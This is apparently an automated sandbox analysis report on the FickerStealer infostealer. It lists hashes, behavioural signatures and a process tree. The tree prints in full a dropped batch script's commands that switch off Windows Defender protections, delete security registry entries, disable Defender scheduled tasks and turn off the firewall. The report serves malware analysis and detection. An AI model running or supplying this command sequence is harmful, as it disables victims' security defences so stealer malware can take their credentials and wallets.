Analysis
-
max time kernel
66s -
max time network
52s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
28-01-2021 10:48
Static task
static1
Behavioral task
behavioral1
Sample
FickerStealer.exe
Resource
win7v20201028
General
-
Target
FickerStealer.exe
-
Size
307KB
-
MD5
1c213dbc2e5f8646d4c30586b7bcb3d8
-
SHA1
7a7c24e9bde5666de8763232d9ffa012fe9d18cd
-
SHA256
90929f4e6bd28d6a197fef323930502ac1a3dcc9de8d4dba02dc6702fd570e14
-
SHA512
e4b5bf282c771e1ce7152fabd5a44ecd094d5a6b0a61c26d0e25f9df15b55a6efaeaeca6a4f52a84d8d5859b6d3d2e8f15280f619edbc7c5ac4321d2359067da
Malware Config
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\49BD.tmp\49BE.tmp\49BF.bat disable_win_def -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Executes dropped EXE 4 IoCs
Processes:
1611834708978.exe1611834709056.exe1611834709056.exeGetX64BTIT.exepid process 1484 1611834708978.exe 908 1611834709056.exe 2024 1611834709056.exe 2040 GetX64BTIT.exe -
Modifies Windows Firewall 1 TTPs
-
Drops startup file 1 IoCs
Processes:
DllHost.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wsuj.exe DllHost.exe -
Loads dropped DLL 5 IoCs
Processes:
FickerStealer.exe1611834709056.exe1611834709056.exepid process 2016 FickerStealer.exe 2016 FickerStealer.exe 2016 FickerStealer.exe 908 1611834709056.exe 2024 1611834709056.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
JavaScript code in executable 6 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\1611834709056.exe js C:\Users\Admin\AppData\Local\Temp\1611834709056.exe js \Users\Admin\AppData\Local\Temp\1611834709056.exe js C:\Users\Admin\AppData\Local\Temp\1611834709056.exe js \Users\Admin\AppData\Local\Temp\1611834709056.exe js C:\Users\Admin\AppData\Local\Temp\1611834709056.exe js -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 6 api.ipify.org 14 api.ipify.org 15 api.ipify.org -
Uses Tor communications 1 TTPs
Malware can proxy its traffic through Tor for more anonymity.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
FickerStealer.exedescription pid process target process PID 1044 set thread context of 2016 1044 FickerStealer.exe FickerStealer.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
FickerStealer.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 FickerStealer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString FickerStealer.exe -
Suspicious behavior: EnumeratesProcesses 681 IoCs
Processes:
FickerStealer.exepowershell.exe1611834709056.exe1611834709056.exepowershell.exepid process 2016 FickerStealer.exe 1672 powershell.exe 1672 powershell.exe 908 1611834709056.exe 908 1611834709056.exe 908 1611834709056.exe 908 1611834709056.exe 908 1611834709056.exe 908 1611834709056.exe 908 1611834709056.exe 908 1611834709056.exe 908 1611834709056.exe 908 1611834709056.exe 908 1611834709056.exe 908 1611834709056.exe 908 1611834709056.exe 908 1611834709056.exe 908 1611834709056.exe 908 1611834709056.exe 908 1611834709056.exe 908 1611834709056.exe 908 1611834709056.exe 908 1611834709056.exe 908 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 1824 powershell.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 1824 powershell.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe 2024 1611834709056.exe -
Suspicious use of AdjustPrivilegeToken 19 IoCs
Processes:
1611834709056.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeSecurityPrivilege 908 1611834709056.exe Token: SeDebugPrivilege 1672 powershell.exe Token: SeDebugPrivilege 1824 powershell.exe Token: SeDebugPrivilege 1964 powershell.exe Token: SeDebugPrivilege 568 powershell.exe Token: SeDebugPrivilege 588 powershell.exe Token: SeDebugPrivilege 1540 powershell.exe Token: SeDebugPrivilege 1148 powershell.exe Token: SeDebugPrivilege 1780 powershell.exe Token: SeDebugPrivilege 1992 powershell.exe Token: SeDebugPrivilege 1880 powershell.exe Token: SeDebugPrivilege 1608 powershell.exe Token: SeDebugPrivilege 1476 powershell.exe Token: SeDebugPrivilege 1248 powershell.exe Token: SeDebugPrivilege 1340 powershell.exe Token: SeDebugPrivilege 1824 powershell.exe Token: SeDebugPrivilege 888 powershell.exe Token: SeDebugPrivilege 1216 powershell.exe Token: SeDebugPrivilege 2024 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
1611834709056.exepid process 2024 1611834709056.exe -
Suspicious use of WriteProcessMemory 199 IoCs
Processes:
FickerStealer.exeFickerStealer.exe1611834708978.execmd.exe1611834709056.exe1611834709056.exedescription pid process target process PID 1044 wrote to memory of 2016 1044 FickerStealer.exe FickerStealer.exe PID 1044 wrote to memory of 2016 1044 FickerStealer.exe FickerStealer.exe PID 1044 wrote to memory of 2016 1044 FickerStealer.exe FickerStealer.exe PID 1044 wrote to memory of 2016 1044 FickerStealer.exe FickerStealer.exe PID 1044 wrote to memory of 2016 1044 FickerStealer.exe FickerStealer.exe PID 1044 wrote to memory of 2016 1044 FickerStealer.exe FickerStealer.exe PID 1044 wrote to memory of 2016 1044 FickerStealer.exe FickerStealer.exe PID 1044 wrote to memory of 2016 1044 FickerStealer.exe FickerStealer.exe PID 1044 wrote to memory of 2016 1044 FickerStealer.exe FickerStealer.exe PID 1044 wrote to memory of 2016 1044 FickerStealer.exe FickerStealer.exe PID 1044 wrote to memory of 2016 1044 FickerStealer.exe FickerStealer.exe PID 1044 wrote to memory of 2016 1044 FickerStealer.exe FickerStealer.exe PID 1044 wrote to memory of 2016 1044 FickerStealer.exe FickerStealer.exe PID 1044 wrote to memory of 2016 1044 FickerStealer.exe FickerStealer.exe PID 2016 wrote to memory of 1484 2016 FickerStealer.exe 1611834708978.exe PID 2016 wrote to memory of 1484 2016 FickerStealer.exe 1611834708978.exe PID 2016 wrote to memory of 1484 2016 FickerStealer.exe 1611834708978.exe PID 2016 wrote to memory of 1484 2016 FickerStealer.exe 1611834708978.exe PID 2016 wrote to memory of 908 2016 FickerStealer.exe 1611834709056.exe PID 2016 wrote to memory of 908 2016 FickerStealer.exe 1611834709056.exe PID 2016 wrote to memory of 908 2016 FickerStealer.exe 1611834709056.exe PID 2016 wrote to memory of 908 2016 FickerStealer.exe 1611834709056.exe PID 1484 wrote to memory of 616 1484 1611834708978.exe cmd.exe PID 1484 wrote to memory of 616 1484 1611834708978.exe cmd.exe PID 1484 wrote to memory of 616 1484 1611834708978.exe cmd.exe PID 1484 wrote to memory of 616 1484 1611834708978.exe cmd.exe PID 616 wrote to memory of 552 616 cmd.exe MpCmdRun.exe PID 616 wrote to memory of 552 616 cmd.exe MpCmdRun.exe PID 616 wrote to memory of 552 616 cmd.exe MpCmdRun.exe PID 616 wrote to memory of 1672 616 cmd.exe powershell.exe PID 616 wrote to memory of 1672 616 cmd.exe powershell.exe PID 616 wrote to memory of 1672 616 cmd.exe powershell.exe PID 908 wrote to memory of 2024 908 1611834709056.exe 1611834709056.exe PID 908 wrote to memory of 2024 908 1611834709056.exe 1611834709056.exe PID 908 wrote to memory of 2024 908 1611834709056.exe 1611834709056.exe PID 908 wrote to memory of 2024 908 1611834709056.exe 1611834709056.exe PID 908 wrote to memory of 2024 908 1611834709056.exe 1611834709056.exe PID 908 wrote to memory of 2024 908 1611834709056.exe 1611834709056.exe PID 908 wrote to memory of 2024 908 1611834709056.exe 1611834709056.exe PID 908 wrote to memory of 2024 908 1611834709056.exe 1611834709056.exe PID 908 wrote to memory of 2024 908 1611834709056.exe 1611834709056.exe PID 908 wrote to memory of 2024 908 1611834709056.exe 1611834709056.exe PID 908 wrote to memory of 2024 908 1611834709056.exe 1611834709056.exe PID 908 wrote to memory of 2024 908 1611834709056.exe 1611834709056.exe PID 908 wrote to memory of 2024 908 1611834709056.exe 1611834709056.exe PID 2024 wrote to memory of 2040 2024 1611834709056.exe GetX64BTIT.exe PID 2024 wrote to memory of 2040 2024 1611834709056.exe GetX64BTIT.exe PID 2024 wrote to memory of 2040 2024 1611834709056.exe GetX64BTIT.exe PID 2024 wrote to memory of 2040 2024 1611834709056.exe GetX64BTIT.exe PID 616 wrote to memory of 1824 616 cmd.exe powershell.exe PID 616 wrote to memory of 1824 616 cmd.exe powershell.exe PID 616 wrote to memory of 1824 616 cmd.exe powershell.exe PID 616 wrote to memory of 1964 616 cmd.exe powershell.exe PID 616 wrote to memory of 1964 616 cmd.exe powershell.exe PID 616 wrote to memory of 1964 616 cmd.exe powershell.exe PID 616 wrote to memory of 568 616 cmd.exe powershell.exe PID 616 wrote to memory of 568 616 cmd.exe powershell.exe PID 616 wrote to memory of 568 616 cmd.exe powershell.exe PID 616 wrote to memory of 588 616 cmd.exe powershell.exe PID 616 wrote to memory of 588 616 cmd.exe powershell.exe PID 616 wrote to memory of 588 616 cmd.exe powershell.exe PID 616 wrote to memory of 1540 616 cmd.exe powershell.exe PID 616 wrote to memory of 1540 616 cmd.exe powershell.exe PID 616 wrote to memory of 1540 616 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe"C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1044 -
C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe"C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe"2⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Users\Admin\AppData\Local\Temp\1611834708978.exe"C:\Users\Admin\AppData\Local\Temp\1611834708978.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\49BD.tmp\49BE.tmp\49BF.bat C:\Users\Admin\AppData\Local\Temp\1611834708978.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:616 -
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true5⤵PID:552
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1672 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1824 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1964 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:568 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:588 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1540 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1148 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1780 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableScriptScanning $true"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1992 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1880 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -MAPSReporting 0"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1608 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1476 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1248 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1340 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1824 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:888 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f6⤵PID:1724
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1216 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f6⤵PID:1240
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "netsh advfirewall set allprofiles state off"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2024 -
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off6⤵PID:1656
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f5⤵PID:1340
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f5⤵PID:672
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f5⤵PID:108
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f5⤵PID:1636
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f5⤵PID:932
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f5⤵PID:1120
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f5⤵PID:344
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f5⤵PID:1824
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f5⤵PID:1376
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f5⤵PID:820
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f5⤵PID:668
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f5⤵PID:1072
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f5⤵PID:976
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:788
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:552
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable5⤵PID:888
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable5⤵PID:368
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable5⤵PID:748
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable5⤵PID:1604
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable5⤵PID:1976
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f5⤵PID:2040
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f5⤵PID:2044
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f5⤵PID:1292
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f5⤵PID:1828
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f5⤵PID:1704
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f5⤵PID:2016
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f5⤵PID:1944
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f5⤵PID:1696
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f5⤵PID:736
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies security service
PID:2036 -
C:\Users\Admin\AppData\Local\Temp\1611834709056.exe"C:\Users\Admin\AppData\Local\Temp\1611834709056.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:908 -
C:\Users\Admin\AppData\Local\Temp\1611834709056.exe"C:\Users\Admin\AppData\Local\Temp\1611834709056.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"5⤵
- Executes dropped EXE
PID:2040
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}1⤵
- Drops startup file
PID:1384
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3d373cec-bf72-49d9-a5bc-ac438d27a74f
MD5e5b3ba61c3cf07deda462c9b27eb4166
SHA1b324dad73048be6e27467315f82b7a5c1438a1f9
SHA256b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
SHA512a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3e48dddf-4be9-404a-8382-f00ce9fa2701
MD57f79b990cb5ed648f9e583fe35527aa7
SHA171b177b48c8bd745ef02c2affad79ca222da7c33
SHA256080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA51220926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_67fed384-9742-42bd-ab48-0dab5caef93b
MD5d89968acfbd0cd60b51df04860d99896
SHA1b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA2561020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7c0d5e51-802d-4619-9520-75f40ede6115
MD5a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA181dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA5128c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8a7ab1e4-4080-418b-8531-9b5c85c91200
MD52d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
SHA512edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bd37edfd-ee25-4ff2-aabe-5183884f66b1
MD5faa37917b36371249ac9fcf93317bf97
SHA1a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
SHA256b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
SHA512614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_cda1b658-b784-4cfa-8068-23e0209d9883
MD56f0d509e28be1af95ba237d4f43adab4
SHA1c665febe79e435843553bee86a6cea731ce6c5e4
SHA256f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA5128dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD517e62f51abf300be64442e8b3eb154d2
SHA11304c56fc2290b390ac985a2fccda2f3568c0096
SHA2567c9e9ec28891fe09144ea647f3dff138bd58ba42599a8207ec29fdc7859d841d
SHA51255f77bf80b6f282bc2da30e1f77ca637b1af05c9b80ed0e8f1b619a090e985eccddd82b9307ab0452cedfb472423597ccb9f10646b2878a460fd68abfafc3674
-
MD5
c4384a44c4f624cfb9b52fbf8116b786
SHA110b43504bef3b004ade71f99784b3bde4e324e8d
SHA256ef98f9fd8e48c339bbb625437f4a19966c58c47f0e79e99ac320027debb9c9c3
SHA51205fb9b58bdf76635d0d2e4d05e6ca76ad7423a91b87d0bf825471c3afe0d714e863f86090db8fb1734a571841c96eb13449bfef4c04bdba1efecb3e3db15eb32
-
MD5
8e8f7ff797c292231959e4dd410a98da
SHA15fba19ae9f76b445d96dbca71f53113492b09d49
SHA256ace9f321c9967b2ffe3bef9056c113b20040fe8831351082e186125aeea8ab0b
SHA512c1e510a6d5f57eaad3b744e20145c07241b1e857e1a1832a0878cd6beedf115a40c8bfd655896d800579110687d208a59416044fdbd2811102aac334720a3c27
-
MD5
8e8f7ff797c292231959e4dd410a98da
SHA15fba19ae9f76b445d96dbca71f53113492b09d49
SHA256ace9f321c9967b2ffe3bef9056c113b20040fe8831351082e186125aeea8ab0b
SHA512c1e510a6d5f57eaad3b744e20145c07241b1e857e1a1832a0878cd6beedf115a40c8bfd655896d800579110687d208a59416044fdbd2811102aac334720a3c27
-
MD5
8e8f7ff797c292231959e4dd410a98da
SHA15fba19ae9f76b445d96dbca71f53113492b09d49
SHA256ace9f321c9967b2ffe3bef9056c113b20040fe8831351082e186125aeea8ab0b
SHA512c1e510a6d5f57eaad3b744e20145c07241b1e857e1a1832a0878cd6beedf115a40c8bfd655896d800579110687d208a59416044fdbd2811102aac334720a3c27
-
MD5
2df9441936169e60a9631bf730cd4273
SHA1979ee79524023a77b9577d077a3472b87fda9834
SHA25624ab289fe2d2dd6e86d9862bf5dac0f6c78acc444eb083152b3eaf84e041f95e
SHA512ab1e894b85c731e9ce84e0cabbab493935bec18e352bd397cf8b3172bb817e9b174069122180d1fc2d9e538864c1cd77fd5c18ce8dd2a45434c9c045f2bf39ee
-
MD5
b4cd27f2b37665f51eb9fe685ec1d373
SHA17f08febf0fdb7fc9f8bf35a10fb11e7de431abe0
SHA25691f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581
SHA512e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e
-
MD5
8e02df4b54e4444e9812ead4fabe7a28
SHA1a7715b3098c2fa02adaced93a613963c39bb1d5d
SHA256d52167b633008ec6311264c9e0c0bc93c91640e503d37b695db4177e4e1bcd2b
SHA5122b4c0d7f3e3457ec90a3e1a87e3e6747f9b26692875b587485f012d411d5865b10d4a4265d5285e46bf38bc1a236b7a0fc73fe1273982e864022c8b4840b2fe6
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5bebb7f3030ef1b957a6ce5653daa5a4a
SHA1688472f5fb3b46abf26f6e8a2756b14926a75c3d
SHA2560650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4
